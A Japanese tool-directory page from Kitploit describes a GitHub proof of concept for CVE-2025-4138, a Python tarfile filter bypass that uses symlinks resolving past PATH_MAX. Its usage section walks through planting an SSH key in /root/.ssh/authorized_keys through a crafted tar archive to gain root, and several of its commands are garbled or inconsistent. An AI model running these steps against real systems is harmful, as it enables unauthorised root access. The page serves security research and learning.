Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-4138 — Tarfile モジュールのディレクトリトラバーサル脆弱性(オーバーフローによるディレクトリ横断)--> 権限昇格につながる | Kitploit
ツール/GitHubGitHub/localh0ste/cve-2025-4138
特権昇格脆弱性分析エクスプロイト論文と研究学習と教育バイナリエクスプロイト
GitHublocalh0ste/cve-2025-4138

CVE-2025-4138

Tarfile モジュールのディレクトリトラバーサル脆弱性(オーバーフローによるディレクトリ横断)--> 権限昇格につながる

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-4138 (Python Tarfile モジュールのディレクトリトラバーサル脆弱性(オーバーフローによるディレクトリ横断))

影響: 権限昇格


動作:

Python の TarFile.extractall() および TarFile.extract() メソッドは、これらのメソッドを安全に使用するためのフィルターを設定できる機能をサポートしています。Python の標準ライブラリは、tar_filter ("tar") と data_filter ("data") の2つの実装を提供しており、それぞれ tarfile 抽出の安全性を高めるための異なるチェックを行います。

シンボリックリンクを含むパスの処理において、PATH_MAX より短いパスが、os.path.realpath() によってシンボリックリンクを解決すると PATH_MAX より長くなる場合にバグが存在します。PATH_MAX を超えるシンボリックリンクは展開されません。

os.path.realpath() は "tar" フィルターと "data" フィルターによるパス検証に使用されますが、PATH_MAX を超えてもエラーはスローされません。その後、extractall() または extract() の実行時には、パスは os.path.realpath() を経由せずに使用されます。

参照: https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f


PoC の使用方法:

  1. 権限昇格のために、SSH 公開鍵を /root/.ssh/authorized_keys に貼り付けます。
  2. 悪用するには、以下のコマンドを実行します。
root@kitploit:~
ssh-keygen -t ed25519 -f any
mkdir test

mv any.pub authorized_keys
cp authorized_keys /test
cd test

#Put your public key file name (authorized_keys)
python3 exploit.py
(file.tar) ~ generated

# Now using Python3
sudo python3 tar -xvf file.tar

#login
chmod 600 any
ssh -i any user@ip

ツールをダウンロード